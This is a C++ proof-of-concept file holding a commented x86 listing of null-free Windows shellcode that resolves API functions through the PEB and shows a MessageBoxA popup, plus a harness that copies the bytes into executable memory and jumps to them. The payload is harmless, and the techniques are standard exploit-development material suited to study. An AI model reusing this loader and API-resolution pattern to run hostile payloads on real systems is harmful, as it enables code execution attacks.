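/*
;------------------------------------------------------------------------
;Title...................All Windows Null-free MessageBoxA Shellcode
;........................167 Bytes
;Release Date............7/11/2011
;Tested On...............Windows 2000, Windows XP, Windows XP x64,
;........................Windows Vista, Windows 7, Windows 8 M3 x64
;------------------------------------------------------------------------
;Author..................John Leitch
;Site....................http://www.autosectools.com/
;Email...................john@autosectools.com
;------------------------------------------------------------------------
bits 32
xor ebx, ebx
jmp short start

;================================
;Find Function
;================================
find_function:

;================================
;Find Kernel32 Base
;================================
mov edi, [fs:ebx+0x30]
mov edi, [edi+0x0c]
mov edi, [edi+0x1c]

module_loop:
mov eax, [edi+0x08]
mov esi, [edi+0x20]
mov edi, [edi]
cmp byte [esi+0x0C], '3'
jne module_loop

;================================
;Kernel32 PE Header
;================================
mov edi, eax
add edi, [eax+0x3c]

;================================
; Export directory table
;================================
;0x00 Export Flags
;0x04 Time/Date Stamp
;0x08 Major Version
;0x0A Minor Version
;0x0C Name RVA
;0x10 Ordinal Base
;0x14 Address Table Entries
;0x18 Number Of Names
;0x1c Address Table RVA
;0x20 Name Pointer Table RVA
;0x24 Ordinal Table RVA
;================================

;================================
;Kernel32 Export Directory Table
;================================
mov edx, [edi+0x78]
add edx, eax

;================================
;Kernel32 Name Pointers
;================================
mov edi, [edx+0x20]
add edi, eax

;================================
;Find LoadLibraryA
;================================
mov ebp, ebx

name_loop:
mov esi, [edi+ebp*0x4]
add esi, eax
inc ebp
mov ecx, [esp+0x4]
cmp dword [esi], ecx
jne name_loop
mov ecx, [esp+0x8]
cmp dword [esi+0x4], ecx
jne name_loop

;================================
;LoadLibraryA Ordinal
;================================
mov edi, [edx+0x24]
add edi, eax
mov bp, [edi+ebp*0x2]

;================================
;LoadLibraryA Address
;================================
mov edi, [edx+0x1C]
add edi, eax
mov edi, [edi+(ebp-0x1)*0x4] ;subtract ordinal base
add eax, edi
ret

start:
;================================
;Call LoadLibraryA
;================================
push 0x7262694C ;Libr
push 0x64616F4C ;Load
call find_function
xor ecx, ecx
mov cx, 0x3233 ;32
push ecx
push 0x72657375 ;user
push esp ; lpFileName
call eax
push eax

;================================
;Call GetProcAddress
;================================
push 0x41636F72 ;rocA
push 0x50746547 ;GetP
call find_function
pop ecx
pop ecx
pop ecx
push 0x041786F0; oxA
shr dword [esp], 0x4
push 0x42656761; ageB
push 0x7373654D; Mess
push esp ; lpProcName
push ecx ; hModule
call eax

;================================
;Call MessageBoxA
;================================
push ebx
push ebx
push ebx
push ebx
call eax
*/

#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
 * Proof-of-concept harness for the listing above: copies the assembled bytes
 * into an executable region and transfers control to them.
 *
 * The listing is `bits 32`, so this translation unit must be built as a
 * 32-bit (x86) executable; the `fs:` segment walk and the 4-byte pushes do
 * not apply to x64.
 *
 * Returns 0 after the payload returns, 1 if the region cannot be committed.
 * Note that the listing ends with `call eax` (MessageBoxA) and has no final
 * `ret`, so it is not expected to hand control back to main cleanly.
 */
int main() {
    // Bytes of the listing above (20 lines of 8 plus a final 7 = 167, which
    // matches the header). Declared const: a string literal is read-only,
    // and the original non-const `char*` binding is ill-formed in modern C++.
    static const char shellcode[] =
        "\x31\xdb\xeb\x55\x64\x8b\x7b\x30"
        "\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47"
        "\x08\x8b\x77\x20\x8b\x3f\x80\x7e"
        "\x0c\x33\x75\xf2\x89\xc7\x03\x78"
        "\x3c\x8b\x57\x78\x01\xc2\x8b\x7a"
        "\x20\x01\xc7\x89\xdd\x8b\x34\xaf"
        "\x01\xc6\x45\x8b\x4c\x24\x04\x39"
        "\x0e\x75\xf2\x8b\x4c\x24\x08\x39"
        "\x4e\x04\x75\xe9\x8b\x7a\x24\x01"
        "\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c"
        "\x01\xc7\x8b\x7c\xaf\xfc\x01\xf8"
        "\xc3\x68\x4c\x69\x62\x72\x68\x4c"
        "\x6f\x61\x64\xe8\x9c\xff\xff\xff"
        "\x31\xc9\x66\xb9\x33\x32\x51\x68"
        "\x75\x73\x65\x72\x54\xff\xd0\x50"
        "\x68\x72\x6f\x63\x41\x68\x47\x65"
        "\x74\x50\xe8\x7d\xff\xff\xff\x59"
        "\x59\x59\x68\xf0\x86\x17\x04\xc1"
        "\x2c\x24\x04\x68\x61\x67\x65\x42"
        "\x68\x4d\x65\x73\x73\x54\x51\xff"
        "\xd0\x53\x53\x53\x53\xff\xd0";

    // Size of the region committed for the payload (one page on x86).
    const SIZE_T kRegionSize = 4096;

    // strlen() stops at the first 0x00 byte, so this measurement is only
    // correct while the payload stays null-free, as the header states.
    const size_t length = strlen(shellcode);

    // %i with a size_t argument is a format mismatch; %zu is the matching
    // conversion. Flush before the jump below, since control may not return
    // and a buffered line would otherwise be lost.
    printf("shellcode length: %zu", length);
    fflush(stdout);

    // Guard the copy so a longer payload cannot run past the region.
    if (length > kRegionSize) {
        fprintf(stderr, "shellcode (%zu bytes) exceeds region (%lu bytes)\n",
                length, static_cast<unsigned long>(kRegionSize));
        return 1;
    }

    // A single RWX page is the simplest mapping for a demo; production code
    // keeps writable and executable permissions separate. The original
    // dereferenced the result without checking it, which crashes on failure.
    LPVOID region = VirtualAlloc(NULL, kRegionSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (region == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }

    memcpy(region, shellcode, length);

    // Named cast in place of the C-style function-pointer cast.
    reinterpret_cast<void (*)()>(region)();
    return 0;
}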